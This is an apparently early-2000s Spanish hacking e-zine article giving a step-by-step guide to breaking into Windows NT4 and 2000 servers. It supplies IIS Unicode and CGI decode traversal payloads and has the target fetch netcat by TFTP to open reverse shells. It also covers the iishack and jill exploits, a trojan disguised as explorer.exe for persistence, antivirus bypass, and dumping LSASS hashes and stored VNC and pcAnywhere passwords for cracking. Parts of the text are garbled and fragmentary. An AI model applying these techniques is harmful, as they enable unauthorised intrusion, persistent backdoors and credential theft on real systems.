Fallas Básicas NT4 y Win2000 Por DeadSector |
|||
ffffffffffffffdsfsdfs |
El motivo de este articulo es dar una explicación de las fallas comúnmente encontradas en Windows NT, los errores de los administradores y una pequeña descripción de el manejo de las herramientas mencionadas. Las herramientas mencionadas en este articulo son: pulist.exe = Te da listado de programas corriendo en Server y números
PID. Empecemos con el típico scan de puertos con superscan, el cual nos dice cuales puertos tiene abiertos y accesibles desde fuera, una vez dentro comparamos con resultado de "netstat -an" as sabremos si están cerrados o simplemente bloqueados por firewall. Encontramos puertos de ftp, web server, file and printer sharing, pcanywhere y VNC abiertos. Seguimos con scan de cerberus el cual nos dirá que fallas tiene el web server, shares, ftp, etc. Por ultimo checamos si el server tiene bug de extended unicode o cgi filename decode error. Esto lo puedes hacer con script o directamente con internet explorer checando los diferentes directorios.
CGI FILENAME DECODE ERROR No solo %c0%af funciona, puedes intentar %c1%1c ,%c0%9v ,%c0%qf ,%c1%8s
Ahora ya tienes la información necesaria para empezar. Lo que buscamos es control total del servidor. Se debe conseguir acceso al server y mantenerlo durante el tiempo posible. No buscamos hacer un defacement estúpido y sin sentido. "Como cambio mis calificaciones?" = Estudiando. Las respuestas están enfrente de ti, han estado ahí todo el tiempo, escucha a tu maestro, lee los libros haz tu tarea, no seas un zángano. El scan se debe expander a todas las máquinas de la red, no solo al servidor. La mayor parte de la información esta en las maquinas de los admins o gente de soporte. En un pwl puede estar el pass de admin de un server y en el 90% de los casos tienen grabados los passwords en archivos como cuteftp, wsftp, eudora, netscape, vnc, icq, pcanywhere, napster y en unos casos en MYDOCUMENTS en un archivo llamado IMPORTANTE.XLS o IMPORANTE.DOC.
Lo primero de la lista fue el ftp, aquí solo buscamos lo básico. Ver si tenemos acceso con cuenta anónima o con alguna cuenta que salió de cerberus. Si tienes acceso checa si puedes ver c:\ d:\ o cualquier directorio importante. Buscar algún archivo que contenga un password. Ver si tenemos derecho a escribir en algún directorio, ya sea solo web, c:\ etc. Inclusive se podría hacer un dir llamado cgi-bin que te permita ejecutar tus archivos desde web. Si tienes acceso a c:\ subes explorer.exe y troyano y esperas que el admin haga login. Este programa (EXPLORER.EXE) se ejecuta cuando hace login el admin, para mas información lee la info que viene en el zip. EXPLORER.EXE ejecutara el troyano y después el explorer.exe original de c:\winnt Todo esto sucede invisible y el admin no se da cuenta de nada. Una explicación mas detallada de como ejecutar desde web o explorer.exe viene mas adelante. Si eres algún niño llamado Carlitos y solo se te ocurre
usar esta falla para subir un estúpido
FRONTPAGE Este solo es el primer paso, de aquí puedes controlar el servidor, pero eso depende de ti. Si eres algún "cyberh4x0r Rul3z ph33r me" y solo se te ocurre usar FrontPage para poner tu html que dice: "OWNED! aquí no hay seguridad, denme trabajo!! Yo si se!! admin mail me!" y cuando el admin te pide ayuda lo único que sabes es decir con letras y números: "4rr3gl4 tu Fr0nt P4g3 ! Usa Linux!! NT tiene demasiadas f4ll4s !" entonces también suckeas y eres digno de llevar el nombre de Pendejo a donde quiera que vayas, y si, aunque no lo crean también existe gente así.
Primero usas NC para abrir un puerto en tu maquina y esperar la shell. nc.exe -l -p 8080 <--- Esto abre el puerto 8080 en tu maquina. Luego ejecutas jill en tu maquina y pides el shell a puerto 80 de tu maquina con: jill sever.com 80 tu-maquina-ip
tu-puerto Y en la pantalla donde tienes nc.exe escuchando debe salir el típico: Microsoft Windows 2000
[Version 5.10.6578] C:\>_
Este es entre los favoritos de los scriptkiddies, porque solo basta con correrlo. iishack1.5.exe www.server.com 80 6969 Esto busca la falla remota en server puerto 80 y si la encuentra sube el ..asp, luego lo ejecuta y abre el puerto 6969. así que solo haces telnet a server puerto 6969 y ya tienes tu
shell de LOCAL SYSTEM. Microsoft(R) Windows
NT(TM)
iishack.exe www.server.com 80 www.tuserver.org\troyano.exe Esto tronaba el web server y lo hacia que bajara tu troyano y lo ejecutara, luego entrabas por telnet si lo que subiste te daba shell o con el cliente de tu troyano.
Pero las mismas técnicas que explicare para extended unicode se pueden usar para msadc, solo que en lugar de hacerlo desde internet explorer se hacen con script msadc.pl y sin ver los resultados que te da el server. EXTENDED UNICODE & CGI FILENAME
DECODE ERROR El extended unicode lo utiliza mandando el equivalente a / = %c0%af El cgi filename convierte el \ en %5c HEX Por ejemplo si pides /scripts/.../cmd.exe?/c+dir Si pides http:\\server\msadc\..cmd.exe?/c+dir Esto solo te permite ejecutar comandos con privilegios de cuenta IUSER_nombremaquina. Primero tenemos que encontrar que dir te permite ejecutar. Como ya lo dijimos las opciones son: UNICODE CGI FILENAME DECODE ERROR No solo %c0%af funciona, puedes intentar %c1%1c ,%c0%9v ,%c0%qf ,%c1%8s ,%c1%9c ,%c1%pc Con esto puedes ejecutar cualquier comando como si estuvieras en tu shell de command prompt, usa tu imaginación. Comandos comúnmente usados son COPY, DIR, DEL, ATTRIB, MOVE, NETSTAT, etc. Antes de empezar asegúrate de tener TFTP server corriendo en tu maquina y las herramientas en el directorio de default. ASEGURATE que esta funcionando, no pierdas tu tiempo si tu isp o firewall tienen bloqueados puerto 69 UDP. Desde internet explorer o usando tu script favorito pide: UNICODE UNICODE UNICODE UNICODE Compara esto con el listado de puertos que te dio el scanner. Si con
scanner solo podías ver UNICODE UNICODE Puedes estar así todo el mendigo día pero no te lo recomiendo, solo son ejemplos. Esto seria lo siguiente para conseguir acceso a un server. Ojo, estoy abreviando el server.com/scripts/blah blah blah. tu lo tienes que poner completo en tu browser, esto haría que tu el server baje de tu maquina el nc.exe y lo guarde en c:\ Porque en c:\ ? para evitar pedos, a veces esta configurado el server para que no cualquiera pueda escribir a dir de web o cualquier directorio, pero siempre se puede escribir en c:\. o casi siempre. Solo he encontrado un server donde cerraron casi todo. Ese día batalle pero encontré la manera de subir troyano y ejecutarlo. Como? Aunque tenia cuenta de admin no me dejaba pero dejaron un directorio donde podía escribir. Era el de antivirus, norton creo o mcafee. Apague el servicio antivirus desde computer manager, me fije el nombre de ejecutable, subí mi troyano a ese dir con ese nombre, volví a arrancar el servicio de antivirus y Tómala! Se ejecuta el troyano, todo gracias al antivirus. Continuemos. Ahora ya tenemos c:\nc.exe solo falta ejecutarlo y entrar
por telnet. Esto te da un shell de command prompt en el puerto 3000. Solo haces telnet
a ese puerto. Primero corre en tu maquina NC.EXE -l -p 80 Esto hace que el server haga un conexión al puerto 80 de tu maquina
y te mande sesión de Una vez dentro, tienes que subir EXPLORER.EXE y TROYANO.EXE a dir c:\ El explorer.exe de vlad@raza-mexicana.org hace que cuando el admin haga login ejecute automáticamente el troyano, después el verdadero c:\winnt\explorer.exe este programa lo puedes bajar de www.raza-mexicana.org Después ejecutas PULIST.EXE o TLIST.EXE (el que tengas) y apuntas todos los nombres y PIDS de los programas que están corriendo. Luego con NET START te dirá que servicios están corriendo, apunta todo. Busca en todos los directorios y en todos los HD que encuentres, apunta que software tienen instalado, checa las fechas, cuales son los que mas utilizan? Quieres mas backdoors? Copia CMD.EXE a scripts, otro buen lugar para
cmd.exe Renómbralo a otra cosa, si pides desde web a cmd.exe que redireccione
algo a >archivo no te deja, pero si se llama de otra manera si te deja.
Por ejemplo http://server/scripts/cmd.exe?/c+dir+>dir.txt no funciona
Los shares C$ D$ solo pueden ser utilizadas si eres admin, No importa que solo puedas montar IPC$ como USER, esto serviría de mucho. Muchos passwords están en registro de windows y pueden ser sacados luego crackeados usando una simple cuenta de USER. Solo tienes que mapear IPC$ correr regedit en tu maquina y seleccionar CONNECT NETWORK REGISTRY. Por ejemplo VNC y EXCHANGE, puedes sacar el pass encryptado de VNC y crackearlo. Si conseguiste acceso a c:\ busca en todos los directorios, lo que buscamos
son archivos que Sube explorer.exe y troyano a c:\ y espera que el admin haga login, esto te conseguirá un backdoor para regresar en futuro.
A veces no es suficiente cambiar el pass de ranita a ranita1. Si sabes que alguien entro a tu maquina lo recomendable es FORMATEAR, no puedes confiar en un server después de que alguien entro. Como sacar los passwords? Si ya tienes privilegios de admin solo ejecuta pulist y apunta el PID de LSASS, luego ejecutas en el server pwdump2.exe 48 <-- en caso de que ese fuera el pid esto te da listado de hash a pantalla. Si quieres grabar a archivo seria pwdump2.exe 48 > passwords-hash.txt Ahora sube password-hash.txt a tu maquina y usa l0phtcrack o LC3 como ahora se llama para crackear los passwords.Si conseguiste smdata.dat instala cuteftp en tu maquina y metelo a ese directorio, luego corres cuteftp y con REVELATION ves los passwords detrás de los ********** si sacaste WS_FTP.INI o algún otro ini de la misma manera los puedes crackear o simplemente busca un prog que desencripte estos passwords.
OJO dije versión 8 ( ocho ) no dije 9 ni 9.2 ni 10. dije 8 ( ocho ) Solo selecciona archivo.cif y con botón derecho seleccionas PROPERTIES luego ventana de SETTINGS y ahí viene el ***** con revelation sale el pass. Prendes pcanywhere y entras al server, el login será el nombre de archivo.
regedit /e vnc.reg
HKEY_LOCAL_MACHINE\Software\ORL\WinVNC3 Esto mandaría el contenido de winvnc a archivo reg y de ahí puedes ver el pass y desencriptarlo usando cracker para winvnc.lo, puedes bajar de aquí: VNCrackX4 by Phenoelit (www.phenoelit.de) Ya con ese pass entras al server de vnc desde internet explorer o usando
el cliente de WINVNC. EXCHANGE Una manera de ver el registro es mapear un share, ejecutas regedit en tu maquina y seleccionas opción de CONNECT NETWORK REGISTRY.
Si esta apagado el servicio AT lo puedes prender desde tu maquina. En W2k te vas a control panel ADMINISTRATIVE TOOLS y ejecutas COMPUTER MANAGEMENT, luego ACTION y CONNECT TO ANOTHER COMPUTER. De ahí puedes prender servicios, rebootear maquina, borrar logs, etc. también existe un prog que puedes bajar del ftp de microsoft; SC.exe, que te permite modificar servicios desde command prompt. Vale la pena bajarlo junto con pulist, kill y otros programas desde ftp microsoft. Para prender AT te vas a SERVICES y prendes el TASK SCHEDULER, ahora ya puedes usar AT desde tu maquina. Si la maquina que estas controlando es W2k seleccionas donde dice COMPUTER MANAGEMENT (127.0.0.1) y le picas con botón derecho. luego seleccionas properties.en ADVANCED STARTUP AND RECOVERY trae la opción de SHUTDOWN. sirve si instalaste parche y quieres hacer reboot. LOGFILES Aunque no lo creas una de las cosas que te puede AYUDAR a conseguir ADMIN son los LOGFILES. si alguien te dice que lo primero que debes hacer al entrar a un server es borrar los logfiles estan equivocados. Por lo regular se encuentran en este directorio
c:\winnt\system32\logfiles Es todo por hoy. Existen mas cosas que se pueden hacer en un server? SI. Me falto algo en este text? SI. Quieres escribirme para echarme pedos porque no pudiste hacer algo que
dije? Si respondiste SI a cualquiera de esas preguntas, no pierdas tu tiempo. Casi no contesto los e-mails y muchas veces los borro sin leerlos. Lo que debes hacer es escribir un articulo y mandarlo a raza-mexicana. Coopera con lo poco que puedas. Escribe de lo que sabes, faltan demasiados detalles, fallas, parches, etc, que no se mencionaron aquí. Cualquiera de esos seria un buen articulo. Para aquellos que no saben y quieren aprender pueden mandar sus requests. Se pasara a resto de integrantes del team y probablemente saldrá un articulo hablando de eso en próximo Ezine. Para los newbies que apenas empiezan. Me gustaría enseñarles lo hermoso que es encontrar una solución a un problema, compartir lo que se siente al ayudar a un amigo a reparar su maquina o parchar su server. Por favor evítenme la pena de rayarles la madre y no manden correos pidiendo hackear un server por x razón. Me gustaría juntar un team de 300 newbies y enseñarles lo poco que se, siempre ha sido mi sueño. Si te crees lo suficiente newbie envíame un email, cuando juntemos 300 empezamos.
|
||
Comentarios a : deadsector@raza-mexicana.org
|